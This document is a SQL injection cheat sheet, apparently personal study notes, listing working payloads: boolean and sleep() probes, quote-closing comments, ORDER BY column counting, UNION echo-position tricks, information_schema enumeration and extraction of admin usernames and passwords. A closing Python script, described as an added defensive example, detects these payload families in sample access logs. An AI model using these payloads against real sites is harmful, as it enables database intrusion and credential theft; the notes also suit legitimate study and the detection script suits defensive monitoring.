select * from test
Show everything in the test table.
select * from test where id=1
Query the row where id=1.
select * from test where id=1 and username='admin'
Both conditions must hold for a row to be returned.
select * from test order by 1
Sort by the first column.
select * from test order by age
Sort by age.
select * from test limit 0,1
Start at the first row and show one row.
select * from test union select * from bigfish
The column counts before and after the union must match.
select * from test union select *,1 from bigfish
If they differ, pad the shorter side to match.
select * from test union select 1,2,3,database();
Query the current database name.
Numeric parameter
and 1=1
and 1=2
and sleep(5)
String parameter (the quote has to be closed)
' and 1=1 %23  (%23 is the URL-encoded #)
' and 1=1 -- asd  (-- must be followed by a space)
' and 1=1 --   (a + in the URL is converted to a space)
Determine the column count from the page (a binary search is a bit better than counting up one by one)
id=1 order by 1  if the page is normal, column 1 exists; continue with order by 2, and so on
Find the echo positions (which columns are displayed)
id=1 union select 1,2,database()
The result may not show up because the page is already filled by the first query's row.
id=1 and 1=2 union select 1,database()
Make the front query return nothing so the back query's result can be displayed.
id=1.999 union select 1,database()
Likewise, a non-existent id can be used to display the back query's result.
Query the database version
and 1=2 union select 1,version()
Enumerate databases
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
Enumerate table names
and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1
and 1=2 union select 1,table_name from information_schema.tables where table_schema='<database name>' limit 1,1
Query column names
and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
Query column contents
and 1=2 union select 1,username from admin
Databases: select schema_name from information_schema.schemata
Tables: select table_name from information_schema.tables where table_schema='security'
Columns: select column_name from information_schema.columns where table_name='users'
Data: select username,password from security.users
id=1 and exists(select * from admin)
exists() checks whether a query returns anything, so it can test whether the table exists; then replace * with a specific column such as password to check whether that column exists.
id=1 union select 1,2,3,4,5,username,password,8 from admin
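As an added defensive example (not part of the original notes), this Python script classifies the payload families listed above, boolean and time-based probes, ORDER BY column counting, and UNION / information_schema enumeration, over constructed sample access-log lines. The log lines, the request paths and the rule names are assumptions; decoding follows the note that %23 becomes # and + becomes a space.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original notes); the
# requests mirror the payload families above: boolean, time-based, ORDER BY
# column counting and UNION / information_schema enumeration.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20and%201=2 HTTP/1.1" 200 40
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1'%20and%20sleep(5)%23 HTTP/1.1" 200 40
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%20order%20by%203 HTTP/1.1" 500 40
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1.999%20union%20select%201,database() HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /item.php?id=1+and+1=2+union+select+1,table_name+from+information_schema.tables HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 900
"""

# Extract the query string from the request token of a combined-format line.
REQ = re.compile(r'"(?:GET|POST)\s+\S*?\?(\S*)\s+HTTP/')

# Ordered (family, pattern) pairs; the first match wins, so the most specific
# family is reported. Patterns run on the decoded, lower-cased query string.
RULES = [
    ("schema_enum", re.compile(r"\binformation_schema\.(schemata|tables|columns)\b")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("boolean_tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
]

def normalize(query):
    """Decode %xx and '+' as the server would, then squash comments and spaces."""
    q = unquote_plus(query).lower()
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q)

def classify(line):
    """Return the payload family for one log line, or None if it looks benign."""
    m = REQ.search(line)
    if not m:
        return None
    q = normalize(m.group(1))
    for family, pattern in RULES:
        if pattern.search(q):
            return family
    return None

def scan(log_text):
    """Map each flagged line number (1-based) to its payload family."""
    hits = ((n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1))
    return {n: fam for n, fam in hits if fam}
```

The last sample line ("union station") is a benign search that shares a keyword with the UNION payloads and is left unflagged, which is the false-positive case a rule like this must handle.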